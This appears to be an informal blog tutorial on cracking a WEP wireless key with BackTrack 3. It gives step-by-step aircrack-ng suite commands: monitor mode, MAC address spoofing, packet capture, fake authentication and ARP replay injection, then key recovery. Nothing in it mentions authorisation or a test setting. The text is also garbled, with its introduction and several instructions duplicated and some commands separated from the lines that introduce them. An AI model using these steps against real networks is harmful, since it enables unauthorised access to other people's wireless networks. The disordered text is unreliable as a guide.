Hello friends today i am going to write something about "how to crack WEP wireless key.
for this you have following things:
please friend be patient while doing this process.
friend you'll need to launch Konsole, BackTrack's command line. it is in the lower left corner.
now type this comand:
for this you have following things:
- wireless adapter
- A BackTrack 3 Live CD
please friend be patient while doing this process.
friend you'll need to launch Konsole, BackTrack's command line. it is in the lower left corner.
now type this comand:
airmon-ng
Now run following command.
note that type everything clearly . In the place of interface you can type your wlan interface .
Now we are going to pick network. Run:
now its time to watch we have to capture that information to a file. you have to Run:
Now its time for capture the data . you have to run
after collecting large amount of data run this command
You will see The WEP key to "KEY FOUND
airmon-ng stop (interface)
ifconfig (interface) down
macchanger --mac 00:11:22:33:44:55 (interface)
airmon-ng start (interface)
note that type everything clearly . In the place of interface you can type your wlan interface .
Now we are going to pick network. Run:
airodump-ng (interface)
now its time to watch we have to capture that information to a file. you have to Run:
airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface)
open a new Konsole window and type this command
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)
here essid is the name of wireless which you are going to crack( ESSID is the access point's SSID name).Now its time for capture the data . you have to run
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)
after collecting large amount of data run this command
aircrack-ng -b (bssid) (file name-01.cap)
here file name should be whatever you want,you can give it any name.
You will see The WEP key to "KEY FOUND
"
thank you.
have a fun. copyright@imsubhu